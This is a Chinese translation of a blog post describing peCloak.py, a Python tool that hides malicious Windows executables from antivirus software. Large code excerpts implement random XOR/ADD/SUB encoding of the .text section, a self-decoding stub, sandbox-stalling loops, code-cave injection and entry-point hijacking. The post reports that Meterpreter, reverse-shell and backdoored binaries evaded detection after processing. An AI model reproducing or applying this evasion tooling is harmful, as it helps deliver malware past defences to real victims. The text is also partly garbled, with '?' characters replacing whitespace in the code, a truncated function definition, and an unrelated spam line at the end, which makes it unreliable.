5286

0x00 前言

From: http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

在開始實驗之前，得先說明這并不是真正意義上的實驗。

并且這個實驗前提也很簡單：AV 查殺很大程度上依賴文件特征，應用程序沙盒/動態查殺。

因此我也很自信如果通過修改可執行文件的部分以及一些基礎實用的沙盒繞過方法就可以使大部分客戶端AV失效。

我整理了下面這些條件：

1.修改過的PE文件必須可躲避常見且最新版本的AV查殺。
2.編碼過的payload必須可以正常無錯運行，因為AV的攔截而導致的無法運行則認為是失敗的。
3.免殺的整個過程(編碼，解碼等)必須是自動化的，代碼運行無須任何手動操作或調試器參與。

0x01 測試環境

Windows XP SP3虛擬機，Kali Linux。

Payload:

兩個metasploit payload(meterpreter_reverse_tcp 與shell_reverse_tcp)
一個本地提權exploit(KiTrap0D aka”vdmallowed”)
一個含 reverse_tcp后門的可執行文件(strings.exe from sysinternals)

這些修改編碼操作都可以被驗證有效。

0x02 免殺過程

為了成功免殺，我列出了一些重要的點。

首先，我需要改善之前一些會被特征查殺的編碼或加密操作。另外我又給自己一個限制，在編碼器中我只能用一些簡單的xor，add，或者sub指令。不是因為其他的操作復雜，而只是為了證明躲避特征查殺編碼操作并不需要那么復雜。

其次，我需要繞過反病毒軟件的沙盒偵查，啟發式查殺操作。

最后，我想盡量減少可執行文件中解碼/啟發式代碼特征防止其成為一種被查殺特征。

0x03 peClock.py

為了滿足所有要求，我寫了一個python腳本，叫做“peCloak”。盡管我大致的完成了基本操作，但還是要清楚大塊花了一個星期的時間，所以代碼還有很多需要完善的地方。而且我也沒打算將它作為Veil Framework的替代，所以我并不打算長久的維護這個腳本。這是個簡單的自動化免殺腳本，而且這只是我實驗中小小的一次開發過程。但我仍希望我用的這些方法便于你深入的理解免殺的世界。

請注意使用該腳本你需要自行解決下面的依賴關系：

pydasm pefile SectionDoubleP

程序下載 peCloak.py

盡管我并不會深入的講解所有的代碼內容(作為一個beta版本，代碼的注釋已經寫的很清楚了)。

接下來隨我了解一些我使用的免殺方法吧！

0x04 編碼

為了防止特征化查殺，選擇一些編碼方式是很重要的，在我強加的條件中有提到只用一些簡單的add，sub，xor指令。動態的選擇編碼順序，我想出了下面這個非常簡單的方法 (函數內容有簡要刪減)：

#!python
def build_encoder():
?
    encoder = []
    encode_instructions = ["ADD","SUB","XOR"] # possible encode operations
    num_encode_instructions = randint(5,10) # determine the number of encode instructions
?
    # build the dynamic portion of the encoder
    while (num_encode_instructions > 0):
        modifier = randint(0,255)

        # determine the encode instruction
        encode_instruction = random.choice(encode_instructions)
        encoder.append(encode_instruction + " " + str(modifier)) 

        num_encode_instructions -= 1

????????... snip ...
?
    return encoder

它滿足我所有的標準 —— 數增化為一系列簡單隨機的的數、順序、操作符的操作。

編碼過程發生在腳本運行讀取文件內容時并且逐字節編碼指定的塊，默認的，腳本將會編碼包含可執行代碼的PE塊（比如 .text或者 .code）。但這里是可自定義的。這里使用pefile模塊來做文件模塊尋找檢索工作。

具體內容可以看下面encode_data函數的簡要：

#!python
data_to_encode = retrieve_data(pe, section_name, "virtual") # grab unencoded data from section
?
... snip ...
?
# generate encoded bytes
 count = 0 
 for byte in data_to_encode:
????byte = int(byte, 16)
 if (count >= encode_offset) and (count < encode_length + encode_offset):
????enc_byte = do_encode(byte, encoder)
 else:
????enc_byte = byte
 count += 1
 encoded_data = encoded_data + "{:02x}".format(enc_byte)

 # make target section writeable
 make_section_writeable(pe, section_name)

 # write encoded data to image
 print "[*] Writing encoded data to file"
 raw_text_start = section_header.PointerToRawData # get raw text location for writing directly to file
 pe.set_bytes_at_offset(raw_text_start, binascii.unhexlify(encoded_data))

0x05 解碼

解碼操作相對來說也很簡單，它只是編碼的逆過程。指令的順序也是相反的(FIFO 先入先出)并且指令本身也必須取逆操作(add變成sub，sub變成add，xor不變)。下面是一個編碼和解碼的相對操作過程。

Encoder	Decoder
ADD 9	SUB 7
SUB 3	XOR 3F
XOR 2E	ADD 1
ADD 12	SUB 12
SUB 1	XOR 2E
XOR 3F	ADD 3
ADD 7	SUB 9

解碼函數大致看起來如下：

#!bash
get_address:
?? mov eax, decode_start_address???? ; Move address of sections's first encoded byte into EAX
?
decode:??????????????????????????????; assume decode of at least one byte 
?? ...dynamic decode instructions... ; decode operations + benign fill
?? inc eax?????????????????????????? ; increment decode address
?? cmp eax, encode_end_address?????? ; check address with end_address
?? jle, decode?????????????????????? ; if in range, loop back to start of decode function
?? ...benign filler instructions...??; additional benign instructions that alter signature of decoder

為了完成解碼器，我簡單的使用了一個字典含有各種編碼操作的逆操作。并使用之前編碼時用的次數循環創建對應的解碼器。這也是非常有必要的，因為編碼器每次都是動態創建的(因此也不同)。

#!python
def build_decoder(pe, encoder, section, decode_start, decode_end):

    decode_instructions = {
                                "ADD":"\x80\x28", # add encode w/ corresponding decoder ==> SUB BYTE PTR DS:[EAX] 
                                "SUB":"\x80\x00",   # sub encode w/ corresponding add decoder ==> ADD BYTE PTR DS:[EAX]
                                "XOR":"\x80\x30" # xor encode w/ corresponding xor decoder ==> XOR BYTE PTR DS:[EAX]
                        ?? }
?
    decoder = ""
    for i in encoder:
        encode_instruction = i.split(" ")[0] # get encoder operation
        modifier = int(i.split(" ")[1])      # get operation modifier
        decode_instruction = (decode_instructions[encode_instruction] + struct.pack("B", modifier)) # get corresponding decoder instruction
        decoder = decode_instruction + decoder # prepend the decode instruction to execute in reverse order

        # add some fill instructions
        fill_instruction = add_fill_instructions(2)
        decoder = fill_instruction + decoder

    mov_instruct = "\xb8" + decode_start # mov eax, decode_start
    decoder = mov_instruct + decoder??# prepend the decoder with the mov instruction 
    decoder += "\x40" # inc eax
    decoder += "\x3d" + decode_end # cmp eax, decode_end
    back_jump_value = binascii.unhexlify(format((1 << 16) - (len(decoder)-len(mov_instruct)+2), 'x')[2:]) # TODO: keep the total length < 128 for this short jump
    decoder += "\x7e" + back_jump_value # jle, start_of_decode 
    decoder += "\x90\x90" # NOPS

    return decoder

0x06 Heuristic 繞過

Heuristic 繞過也只不過是一系列指令循環執行誘導AV以為可執行文件已經運行。NOPS, INC/DEC, ADD/SUB, PUSH/POP 指令都是可行的。就像編碼過程一樣，首先生成一個偽隨機數決定起始指令的順序，然后與遞增和比較指令相配對（當然這一過程也是在某個范圍中隨機產生）創建有限的迭代循環。

循環的次數在腳本運行前定義，但是要記住循環次數越多，時間也就越長。

#!python
def generate_heuristic(loop_limit):
?
    fill_limit = 3 # the maximum number of fill instructions to generate in between the heuristic instructions
    heuristic = ""
    heuristic += "\x33\xC0"??                                                       # XOR EAX,EAX
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x40"??                                                           # INC EAX
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x3D" + struct.pack("L", loop_limit)??                            # CMP EAX,loop_limit
    short_jump = binascii.unhexlify(format((1 << 16) - (len(heuristic)), 'x')[2:])??# Jump immediately after XOR EAX,EAX
    heuristic += "\x75" + short_jump??                                          ????# JNZ SHORT 
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x90\x90\x90"??                                                   # NOP
    return heuristic
?
'''
    This is a very basic attempt to circumvent remedial client-side sandbox heuristic scanning
    by stalling program execution for a short period of time (adjustable from options)
'''
def build_heuristic_bypass(heuristic_iterations):
?
    # we only need to clear these registers once
    heuristic_start = "\x90\x90\x90\x90\x90\x90" # XOR ESI,ESI
    heuristic_start += "\x31\xf6"??              # XOR ESI,ESI
    heuristic_start += "\x31\xff"??              # XOR EDI,EDI
    heuristic_start += add_fill_instructions(5)

    # compose the various heuristic bypass code segments??
    heuristic = ""  
    for x in range(0, heuristic_iterations):
        loop_limit = randint(286331153, 429496729)
        heuristic += generate_heuristic(loop_limit) #+ heuristic_xor_instruction
    print "[*] Generated Heuristic bypass of %i iterations" % heuristic_iterations
    heuristic = heuristic_start + heuristic 
    return heuristic

heuristic和解碼器中調用的add_fill_instructions()函數只是簡單的從前文開始處字典中隨機選擇指令(inc/dec, push/pop, 等)。

0x07 開辟代碼區

最終代碼所做的就是編碼設定的PE文件塊，然后插入一個包含heuristic bypass 和相對應的譯碼器的代碼區，這個代碼區所在的位置由腳本運行時檢索PE文件每塊中連續的空字節的最小數量(當前是1000)決定的。如果發現，腳本就會使這個部分標記為可執行，然后在該位置插入代碼。否則腳本將會創建一個使用SectionDoubleP代碼的新塊(名為”.NewSection”)。當然你也可以選擇 –a | -add 參數將代碼插入一個已存在的塊中（或許會損壞文件）。

0x08 跳向代碼區

為了跳入代碼區，改變PE文件的執行流需要修改ModuleEntryPoint,這個過程有兩點需要注意: 創建跳轉指令需要使用之前創建代碼區的地址。

保留ModuleEntryPoint處修改前的指令，這樣不會影響原來的運行。

之后的函數相對來說比較簡單，引入pydasm庫讀出入口處的指令并獲取其相對應的匯編代碼。

#!python
ef preserve_entry_instructions(pe, ep, ep_ava, offset_end):
    offset=0
    original_instructions = pe.get_memory_mapped_image()[ep:ep+offset_end+30]
    print "[*] Preserving the following entry instructions (at entry address %s):" % hex(ep_ava)
    while offset < offset_end:
        i = pydasm.get_instruction(original_instructions[offset:], pydasm.MODE_32)
        asm = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
        print "\t[+] " + asm
        offset += i.length

    # re-get instructions with confirmed offset to avoid partial instructions
    original_instructions = pe.get_memory_mapped_image()[ep:ep+offset]
    return original_instructions

這個函數很重要的一方面是可以保證保留了全部的指令。比如，假設開始時入口處的指令是：

6A 60 ? ? ? ? ? ? ?PUSH 60
68 28DF4600 ???????PUSH pe.0046DF28

如果你的代碼區覆蓋了5字節，你仍想保證開始兩條指令的7個字節，但是就會出現多余的壞字符。

0x09 恢復執行流

這一點，塊入口包括跳轉指令跳轉到代碼區的heuristic bypass函數部分，然后會繼續解碼PE文件編碼過的部分，一旦完成，執行流就會轉向回起初的位置這樣文件就可以按照本身的內容運行。這是含有兩步動作的作業：重運行覆蓋的原始指令。

跳回塊的入口點（抵消添加的代碼塊跳轉）

事實上因為包含相對的 jump/call指令重運行原始指令會變的很復雜。這些jump/call指令需要就現在的代碼區偏移位置重新計算。

依賴原始跳轉目的地址和現在代碼區的地址重新計算這些相對跳轉指令我得以解決了這個問題。

#!python
current_address = int(code_cave_address, 16) + heuristic_decoder_offset??+ prior_offset + added_bytes

# check opcode to see if it's is a relative conditional or unconditional jump 
if opcode in conditional_jump_opcodes:
    new_jmp_loc = update_jump_location(asm, current_address, 6)
    new_instruct_bytes = conditional_jump_opcodes[opcode] + struct.pack("l", new_jmp_loc) # replace short jump with long jump and update location
elif opcode in unconditional_jump_opcodes:
    new_jmp_loc = update_jump_location(asm, current_address, 5)
    new_instruct_bytes = unconditional_jump_opcodes[opcode]??+ struct.pack("l", new_jmp_loc) # replace short jump with long jump and update locatio
else:
    new_instruct_bytes = instruct_bytes

conditional_jump_opcodes?和unconditional_jump_opcodes?變量只是存了各自的操作碼。調用的update_jump_location?函數也很簡單：

#!python
def update_jump_location(asm, current_address, instruction_offset):
    jmp_abs_destination = int(asm.split(" ")[1], 16) # get the intended destination
    if jmp_abs_destination < current_address:
        new_jmp_loc = (current_address - jmp_abs_destination + instruction_offset ) * -1 # backwards jump
    else:
        new_jmp_loc = current_address - jmp_abs_destination + instruction_offset # forwards jump

    return new_jmp_loc

0x10 其他特點

正如我所做的任何事，通常都會有一些拓展所以在這個工具中我也加入了一些其他功能輔助分析目標文件。比如在測試中有的時候我想能夠看到PE文件的某部分來確定是什么誘發了特征檢測所以我加入了一個簡單的十六進制文本查看器。

0x11 保存修改過的PE文件

之前寫過一篇筆記提到想要從自己修改的函數中獲取更多的信息我不得不輕微的修改pefile庫。特別是當我查看issue時發現當pefile 保存一個修改過的文件時，它會覆蓋塊結構數據上的幾個字節。換句話說，如果你修改了某給定文件.rdata塊的前50個字節，修改過的東西將會被原始的塊頭替換。對此，我給pefile 的write()函數加了一個附加參數(SizeofHeaders)。這樣我就可以保留PE文件頭然后替換我想要部分：

enter image description here

同樣，字符串也會被覆蓋所以我又對write()函數做了點修改：

enter image description here

根據你修改的程度，額外的修改也許是有必要的，雖然這兩處修改也可以滿足簡單的測試。

0x12 更詳細的說明 & 結束

假如你想用peCloak或者你自己的工具免殺，下面的這些就是準確使用peCloak操作的參數，還有一些需要記住的： * 首先我并沒有包含每次掃描結果的截圖作為免殺的證據，這樣會使這篇文章篇幅過長，雖然我確實展示了一張示例圖說明免殺的結果。

其次我使用用來編碼的大多數字節范圍并不是優化過的。比如，如果編碼.rdata塊0字節到500字節就會免殺失敗，只是文件還是正常運行了。我并沒有深入測試哪個字節導致了失敗，就將這個練習交給大家了。
最后文中當我提到peCloak默認設置時，我是指heuristic bypass 的level為3(-H 3)而且只編碼.text塊。這就是如果你不帶額外參數運行腳本時的默認設定。

另外，作為提醒，下面四個文件是測試通過的：

av_test_msfmet_rev_tcp.exe – Metasploit Meterpreter reverse_tcp executable
av_test_msfshell_rev_tcp.exe – Metasploit reverse tcp shell executable
strings_evil.exe – strings.exe backdoored with Metasploit reverse_tcp exploit
vdmallowed.exe – local Windows privilege escalation exploit

前三個文件是直接由metasploit生成的，第三個由源代碼編譯，除了peCloak沒有用其他工具處理過。

亚洲欧美在线